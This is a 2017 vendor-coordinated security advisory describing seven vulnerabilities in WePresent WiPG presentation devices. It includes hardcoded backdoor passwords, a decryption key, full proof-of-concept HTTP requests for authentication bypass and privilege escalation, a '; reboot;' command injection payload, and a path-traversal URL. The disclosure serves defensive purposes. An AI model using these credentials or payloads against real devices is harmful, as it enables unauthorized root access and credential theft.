Security Advisory: Multiple vulnerabilities in WePresent WiPG devices
--------------------------------------------------------------------------------
1. Summary
This advisory describes multiple vulnerabilities affecting the WePresent WiPG
devices. Most of the issues covered by this advisory apply to the WiPG-1000,
WiPG-1500 and the WiPG-2000. The vulnerabilities allow an unauthenticated
attacker within the same network as the device to gain administrative access to
its web interface as well as executing arbitrary code with root privileges on
the device.
2. Vulnerable devices and versions
All vulnerabilities have been discovered on the WiPG-1000 device and are likely
to be present on the WiPG-1500 and WiPG-2000 as well but this has not been
verified in all cases. The most current version of the firmware (2.0.0.7 at the
time of writing) was used for the vulnerability research but quick cross-checks
have indicated that many vulnerabilities were present in much older firmware
versions as well.
3. Details
3.1 Web Interface Authentication Bypass
The login.cgi script contains the hardcoded password 'aw%root?' (without quotes)
for the administration area, which allows anyone with access to the network (or
anyone if the device is exposed to the internet) to log in without knowing the
password set by the regular administrator. This is problematic as the
administration area should not be accessible by anyone not in possession of the
correct password. In addition it should be noted, that it's not possible for any
user to change this password which makes it impossible to change this
administrative password except for applying a firmware patch that doesn't
include this issue.
Note: This backdoor does not appear to be present in the WiPG-2000 device.
3.2 Web Interface Privilege Escalation
When changing the administrator's password in the web form the following request
is sent:
---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 96
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
command=Y5orvHOhpS3nxe9eLONG_ADMIN_PWD
newpassword
---
If one logs into the conference control panel on the web UI and then sends this
exact request but inserts their own session ID (which is easily visible in the
URL after logging in) instead, the password will be changed to the new value,
allowing the attacker to login as administrator and thus escalate the user's
privileges.
Note: The underlying issue here is that the session management does not
differentiate between administrative and moderator users. Instead this
difference is handled entirely on the UI level by not showing moderator users
direct links to administrative pages. Their session is valid for administrative
access, however.
3.3 Authentication Bypass
The return_test.cgi file (/home/boa/cgi-bin/return_test.cgi) handles various
user requests, such as updating device preferences (or indeed changing passwords
as seen in the previously described vulnerability), which sends a request in a
pseudo-XML format, the first field of which is value and contains
the current session ID, which is used to verify whether the request came from a
legitimate user. If we manipulate the request and instead of the string
'session-id-here' send the string
'SetFlag' the device will omit the session ID check for
this request and handles the request as though it came from an authenticated
user. See below for a full proof of concept request:
---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 1308
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
command=SetFlagNET_IP_TYPE
1NET_DHCP_EN1
NET_IPredactedNET_MASK
redactedNET_GATEWAYredacted
NET_DNSredactedWL_ESSID
WiPG-1000WL_SWITCH0
WL_SSID_BROADCAST1WL_MODE
9WL_CHANNEL0WL_ENCRYPT
14WL_WPAKEYredacted
WL_BANDWIDTH1APCLIENT_ONOFF
1APCLIENT_ESSIDredacted
APCLIENT_ENCRYPT_MODE7
APCLIENT_ENCRYPT_KEYredacted
SNMP_USER_NAMEadminSNMP_AUTH_PASSWORD
AuthadminSNMP_PRIV_PASSWORDPrivadmin
SNMPTRAPHOST0.0.0.0SNMP_ONOFF
1PREF_GATEKEEPER1
NTP_SYNC1NTP_SERVER_IP
TIME_ZONEGMT-8_CHDOMAIN_NAME
---
3.4 OS Command Injection
The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script is vulnerable to command
injection. A specifically crafted string in the web form leads to arbitrary
shell commands being executed on the device with root privileges. As a simple
proof of concept insert the string `; reboot;` into the input field and press
the download button. The device will execute the command and reboots. The cause
of this vulnerability is that the string given by the user is inserted into the
following command which is then executed: '/bin/awenc -e -i %s -o %s' See below
for a full proof of concept request:
---
POST /cgi-bin/rdfs.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 37
Cache-Control: max-age=0
Origin: http://192.168.100.10
Upgrade-Insecure-Requests: 1
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
Client=%3Breboot%3B&Download=Download
---
Note: This script is assumed to be a development leftover as it doesn't appear
to be ever presented to end users in any way during normal usage. If this is the
case it should be removed from the system entirely.
3.5 Arbitrary File Disclosure
The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script's intended functionality is to
download an arbitrary file from the device. The encryption that is in place (the
call to the /bin/awenc binary as seen in the command injection vulnerability
above) is too weak to be any significant obstacle in exploiting this
vulnerability.
The encryption can easily be reversed by removing the first 512 bytes of an
encrypted file and then shifting the leftover bytes by the hex values of the
hardcoded key, which is '28825885"(("%((%mistral28825885' (without the single
quotes).
As there is no limitation on what file can be downloaded by using this feature,
an attacker could download any file in an encrypted form and then easily decrypt
its contents. This is particularly interesting as an attacker can read the
cleartext passwords chosen for the admin and moderator users as well as the WiFi
key by downloading the file '/tmp/scfgdndf'.
3.6 File Inclusion
The 'login.cgi' (/home/boa/cgi-bin/login.cgi) contains a file inclusion
vulnerability in the 'src' parameter. The file inclusion only appears to be
working for files meeting certain criteria however, returning a 502 error for
other files. The URL
'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh'
can be used as proof of concept. This vulnerability doesn't appear to have any
severe impact as we weren't able to read any files containing information that
couldn't be gained by simply extracting them from the firmware.
3.7 Insecure Maintenance Interface
Requesting the url
'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html' leads
to a login page being served by the 'login.cgi' file, which allows anyone to log
in as 'rdtool' using the hardcoded password 'mistral5885'. Once logged in, one
can enable 'manufacture mode' or 'RD Debug mode', which enables the Telnet
service on the device. The researchers were unable to discover the password for
the root account during the time spent on this research, however anyone in
possession of the password can enable Telnet and get a shell with root
privileges on the device.
4. Credits
* Matthias Brun (main researcher)
* Sven Vetsch
* Dominik Nufer
5. Timeline
* 2017-02-17 Made initial contact with vendor.
* 2017-02-20 Sent advisory to vendor and received confirmation of receipt.
* 2017-03-20 Asked about status. Vendor confirmed the issues have been
triaged and are being fixed.
* 2017-03-27 Received answer confirming all items having been fixed.
* 2017-04-09 Firmware version 2.2.3.0 released, fixing (according to the vendor)
all disclosed vulnerabilities.
* 2017-04-20 Public disclosure of advisory.
6. About Redguard
Redguard is a Swiss-based information security company. We assist our clients
with technical security testing as well as organisational security audits and
consulting. This enables us to have a team with extensive experience in a wide
variety of security relevant topics.
https://www.redguard.ch
contact@redguard.ch
7. Disclaimer
This document is not meant to be a complete list of security issues for any of
the mentioned devices and/or versions. It is possible and indeed likely that
there are further security issues that are yet to be identified.
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no warranties
with regard to this information. Neither the author nor the publisher accepts
any liability for any direct, indirect, or consequential loss or damage arising
from use of, or reliance on, this information.